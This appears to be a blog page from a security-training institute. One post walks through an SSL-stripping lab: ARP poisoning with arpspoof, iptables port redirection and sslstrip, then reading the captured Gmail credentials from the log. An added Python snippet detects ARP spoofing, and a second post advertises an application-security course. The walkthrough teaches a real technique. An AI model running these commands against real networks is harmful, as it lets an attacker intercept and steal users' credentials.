Wednesday, 23 September 2015

SSL Stripping

Let us set up two virtual machines: one runs Windows XP (victim) and the other runs Kali (attacker).

Before we actually target the victim machine using SSLstrip, we need to set up the man-in-the-middle position and the packet redirection / forwarding mechanism.

We follow a step-by-step method to do so:

Please note the IP addresses of both machines; both should be kept on a NAT network.

All commands in steps 1 to 4 should be given in a terminal on Kali.

1. Setting up IP Forwarding: (Use in Kali)

echo 1 > /proc/sys/net/ipv4/ip_forward

2. ARP MITM attack between Victim (Windows XP) and Gateway:

arpspoof -i eth0 -t 192.168.1.6 192.168.1.1 

3. Setting up port redirection using Iptables from port 80 to port 10000

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4. Start the SSLstrip tool and make it listen on port 10000 (the default anyway)

sslstrip -l 10000


5. In Windows XP, log in to Gmail and enter the credentials. (Observe that any https site is changed to http.)

6. To check, give this command in Kali:

cat sslstrip.log


7. We can see the credentials in the sslstrip.log file.
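
Step 2 leaves a trace on the victim: its ARP cache maps the gateway's IP address to the Kali machine's MAC address. The Python example below is added here and is not part of the original post; it parses `arp -a` or `ip neigh` output and flags that condition. It takes 192.168.1.1 as the gateway and 192.168.1.6 as the victim, following the arpspoof command in step 2; the sample table, the other IP addresses and all MAC addresses are constructed.

```python
import re
from collections import defaultdict

# Constructed sample: `arp -a` output on the Windows XP victim while step 2 runs.
# 192.168.1.1 / 192.168.1.6 come from the post's arpspoof command; the other
# addresses and every MAC below are invented for this example.
SAMPLE_ARP_A = """\
Interface: 192.168.1.6 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-0c-29-aa-bb-cc     dynamic
  192.168.1.7           00-0c-29-aa-bb-cc     dynamic
  192.168.1.9           00-0c-29-11-22-33     dynamic
"""

# IPv4 address, then anything, then a MAC written with '-' (Windows) or ':' (Linux).
ENTRY = re.compile(
    r"\b(\d{1,3}(?:\.\d{1,3}){3})\b.*?\b((?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2})\b")


def norm_mac(mac):
    return mac.lower().replace("-", ":")


def parse_arp_table(text):
    """Return {ip: mac} from `arp -a` or `ip neigh` output."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.search(line)
        if m and norm_mac(m.group(2)) != "ff:ff:ff:ff:ff:ff":  # skip broadcast
            table[m.group(1)] = norm_mac(m.group(2))
    return table


def find_spoofing(table, gateway_ip, known_gateway_mac=None):
    """Return findings as (kind, mac, ips) tuples; an empty list means clean."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    # One MAC answering for several IPs is what a poisoned cache looks like.
    findings = [("shared-mac", mac, sorted(ips))
                for mac, ips in by_mac.items() if len(ips) > 1]
    # A recorded baseline catches the case where the attacker's own IP is absent.
    gw_mac = table.get(gateway_ip)
    if known_gateway_mac and gw_mac and gw_mac != norm_mac(known_gateway_mac):
        findings.append(("gateway-mac-changed", gw_mac, [gateway_ip]))
    return findings


if __name__ == "__main__":
    for finding in find_spoofing(parse_arp_table(SAMPLE_ARP_A), "192.168.1.1"):
        print(finding)
```

A shared MAC can also be legitimate (for example a router holding several addresses), so the comparison against a gateway MAC recorded while the network was known to be clean is the stronger of the two checks.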

WOW!! AMAZING... If you want to try it live, you can use a bootable Kali.

Hope you enjoyed sslstrip with Kali...


By GEETA SINGH

Friday, 21 August 2015

CAST-613 Advanced Application Security from EC-Council

CAST-613 is a well-known global certification from EC-Council.

Hardening your own Corporate Web App/Web Site

We normally focus on securing all the devices connected to our network.
We continuously monitor the traffic going in and out of the network and do regular VA/PT, auditing and patching vulnerabilities.

BUT we forget to pay attention to application-level attacks.
It is necessary that we secure our application, write secure code and make it tough for hackers to get inside the application.
This enables us to protect the information in the database, which should not be exposed.

So here comes the CAST-613 Advanced Application Security course in India.
QUIK is the first institute to take the initiative to create more awareness, do hardcore manual testing vs. automated testing, and show the path towards secure data by providing good education.

CAST-613 is different because we have 3 sites hosted on Amazon:
one is the vulnerable site, the second is the secure site and the third is the attacker site.
WOW... Unless you do the labs, you cannot feel it.

The OWASP Top 10 and Top 25 errors are very important to map to PCI-DSS controls.
 
Topics include introducing the vulnerable website, monitoring and composing requests using a common proxy like Fiddler, Paros or Burp Suite, and modifying requests and responses in Fiddler to change what goes out and what comes in before the browser renders it.

We need to understand XSS, SQL injection, CSRF and clickjacking attacks, which make it very easy for a hacker to spoil the site and insert malicious code.

So. BE SECURE......SECURE CODE.

HOPE YOU ALL ENJOY READING... This is my first blog, written on demand of my students, and I will keep writing on lots of topics.

Thanks to all my students who have encouraged me to write...


Geeta Singh